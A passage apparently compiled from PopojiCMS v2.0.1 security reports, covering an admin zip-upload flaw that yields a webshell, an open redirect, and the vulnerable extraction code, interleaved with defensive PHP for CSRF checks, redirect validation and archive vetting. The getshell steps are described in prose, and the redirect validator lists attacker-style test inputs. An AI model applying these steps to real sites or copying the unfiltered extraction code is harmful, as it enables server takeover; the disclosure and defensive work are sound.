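        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrfField(array &$session): string
{
    // Rendered into every backend <form method="POST">.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

function csrfValid(array $session, array $post, array $server): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time, so a wrong token leaks nothing.
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: browsers that send Fetch Metadata label a forged
    // cross-origin POST as "cross-site"; a missing header means an old browser.
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? 'same-origin';
    return $site === 'same-origin' || $site === 'none';
}

// Sketch of the route handler: the check runs before the user table is touched.
function handleAddUser(array $session, array $post, array $server): string
{
    if (!csrfValid($session, $post, $server)) {
        http_response_code(403);
        return 'refused: missing or invalid CSRF token';
    }
    // ... the original add-user logic would run here ...
    return 'created user ' . ($post['username'] ?? '?');
}

// Constructed walk-through.
$session = [];
echo csrfField($session), "\n";

// A forged cross-site form carries the cookie but cannot know the token.
$forged = ['username' => 'attacker'];
echo handleAddUser($session, $forged, ['HTTP_SEC_FETCH_SITE' => 'cross-site']), "\n";

// A guessed token fails too.
$guessed = $forged + ['csrf_token' => str_repeat('0', 64)];
echo handleAddUser($session, $guessed, ['HTTP_SEC_FETCH_SITE' => 'cross-site']), "\n";

// The genuine backend form carries the token that csrfField() rendered.
$genuine = ['username' => 'editor', 'csrf_token' => csrfToken($session)];
echo handleAddUser($session, $genuine, ['HTTP_SEC_FETCH_SITE' => 'same-origin']), "\n";
```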

PopojiCMS v2.0.1 backend plugin function has a file upload vulnerability

Exploit the file upload vulnerability to getshell

Vulnerability details:

In the administration backend, you can upload maliciously built zip files on the plugin administration page.

Vulnerability url: http://127.0.0.1/po-admin/admin.php?mod=component&act=addnew

Steps:

  1. First you need to have backend access

  2. Prepare a zip file containing malicious php

  3. Upload the file in Components/Add Component


  4. Next, you can find the php file at http://127.0.0.1/po-content/component/Component_Name/file_name


Open Redirection Vulnerability

Hi, @abdilahrf and I found an open redirection vulnerability in PopojiCMS. The vulnerable code is in the index.php file at line number 101.

Notice that the parameter refer is used by the code to redirect users to another page. So by crafting a request that uses the POST method and contains the refer parameter, we can control where to redirect the user.
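
The refer parameter described here is a classic open-redirect sink. As an added example, not PopojiCMS code, this is a validator index.php could run on the POSTed refer value before calling header('Location: ...'); the function name and the fallback target are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example, not PopojiCMS code: validates a "refer" value such as the one
// index.php reads from POST, so the redirect can only land on a local path.

function safeRedirectTarget(?string $refer, string $fallback = '/'): string
{
    if ($refer === null || $refer === '') {
        return $fallback;
    }
    // Control characters, whitespace and backslashes are normalised differently
    // by browsers ("/\evil.com" is read as "//evil.com"), so refuse them.
    if (preg_match('#[\x00-\x20\x7f\\\\]#', $refer)) {
        return $fallback;
    }
    // Anything with a scheme ("https:", "javascript:") or that is
    // protocol-relative ("//evil.com") leaves the site.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $refer) || substr($refer, 0, 2) === '//') {
        return $fallback;
    }
    $parts = parse_url($refer);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host']) || isset($parts['user'])) {
        return $fallback;
    }
    $path = $parts['path'] ?? '';
    if ($path === '' || $path[0] !== '/') {
        $path = '/' . $path; // relative targets are resolved against the site root
    }
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    return $path . $query;
}

// Constructed inputs: the first three are local, the rest must fall back to "/".
$samples = [
    '/po-admin/admin.php?mod=home',
    'index.php?page=2',
    '/?s=test',
    'https://attacker.example/phish',
    '//attacker.example/phish',
    '/\\attacker.example',
    'javascript:alert(1)',
    "/ok\r\nSet-Cookie: x=y",
];
foreach ($samples as $refer) {
    printf("%-40s -> %s\n", json_encode($refer), safeRedirectTarget($refer));
}
```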

I found that the background can getshell

Background GETSHELL

Description: The background can upload a compressed package, which is decompressed without filtering, and getshell.

Put a webshell in the archive and upload it.

Then we can access the corresponding directory to getshell.

Code analysis

See line 188 of admin_component.php:

    if (in_array($exp[1], array('zip'))) {
        move_uploaded_file($_FILES['fupload']['tmp_name'], '../'.DIR_CON.'/uploads/'.$componentName);
        if (file_exists('../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss')))) {
            unlink('../'.DIR_CON.'/uploads/'.$componentName);
            $this->poflash->error($GLOBALS['_']['component_message_3'], 'admin.php?mod=component');
        } else {
            $archive = new PoPclZip('../'.DIR_CON.'/uploads/'.$componentName);
            if ($archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss'))) == 0) {
                unlink('../'.DIR_CON.'/uploads/'.$componentName);
                $this->poflash->error($GLOBALS['_']['component_message_3'], 'admin.php?mod=component');
            }

It only judges whether the upload is a zip archive; if so, it is directly decompressed, and the directory it is extracted to is

    $archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/'.$folderinstall.'/'.strtolower($this->postring->valid($_POST['component'], 'xss')))
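
The theme handler (admin_theme.php, quoted earlier on this page) and the component handler here both pass the uploaded archive straight to PoPclZip::extract(). As an added example, not PopojiCMS code, this is the pre-extraction check a defender would put in front of both: it reads the entry names of the uploaded archive with PHP's bundled ZipArchive and refuses archives that would write outside the target folder or drop a server-executable file. The constant and function names are mine, and the two demo archives are constructed.

```php
<?php
// Added example, not PopojiCMS code: vet the entries of an uploaded theme or
// component archive before PoPclZip extracts it. Requires ext/zip.

// Extensions the web server would execute, checked on every dotted segment so
// that "x.php.txt" (Apache multiviews) is caught too.
const BLOCKED_EXTENSIONS = ['php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'php8', 'phar', 'phps'];
// Server configuration files a theme has no business shipping.
const BLOCKED_NAMES = ['.htaccess', '.htpasswd', '.user.ini'];

function archiveProblems(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return ['not a readable zip archive'];
    }
    $problems = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === false) {
            continue;
        }
        $norm = str_replace('\\', '/', $name);
        // Entry names are attacker-controlled: absolute paths, drive letters,
        // "..", and NUL bytes all let an entry escape the extraction directory.
        if ($norm === '' || $norm[0] === '/' || preg_match('#^[A-Za-z]:#', $norm)
            || preg_match('#(^|/)\.\.(/|$)#', $norm) || strpos($norm, "\0") !== false) {
            $problems[] = "escapes target directory: $name";
            continue;
        }
        if (substr($norm, -1) === '/') {
            continue; // directory entry, nothing to execute
        }
        $base = strtolower(basename($norm));
        $segments = explode('.', $base);
        array_shift($segments); // drop the stem, keep every extension segment
        if (in_array($base, BLOCKED_NAMES, true)
            || array_intersect($segments, BLOCKED_EXTENSIONS) !== []) {
            $problems[] = "server-executable entry: $name";
        }
    }
    $zip->close();
    return $problems;
}

// Builds a small archive in a temp file from name => content pairs (demo only).
function buildDemoZip(array $entries): string
{
    $path = tempnam(sys_get_temp_dir(), 'po-zip-');
    $zip = new ZipArchive();
    $zip->open($path, ZipArchive::OVERWRITE);
    foreach ($entries as $name => $content) {
        $zip->addFromString($name, $content);
    }
    $zip->close();
    return $path;
}

// Constructed archives: a legitimate theme, and one shaped like the uploads
// the reports above describe (entry contents are irrelevant to the check).
$clean = buildDemoZip([
    'index.html'    => '<h1>demo theme</h1>',
    'css/style.css' => 'body { margin: 0 }',
]);
$hostile = buildDemoZip([
    'index.html'       => '<h1>looks like a theme</h1>',
    'shell.php'        => 'placeholder',
    'notes.php.txt'    => 'placeholder',
    '../../escape.txt' => 'placeholder',
]);

foreach (['clean' => $clean, 'hostile' => $hostile] as $label => $path) {
    $problems = archiveProblems($path);
    echo $label, ': ', $problems ? implode('; ', $problems) : 'ok to extract', "\n";
    unlink($path);
}
```

Only when archiveProblems() returns an empty array should the handler go on to move the upload and call $archive->extract(); a non-empty result is worth logging together with the uploading account.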
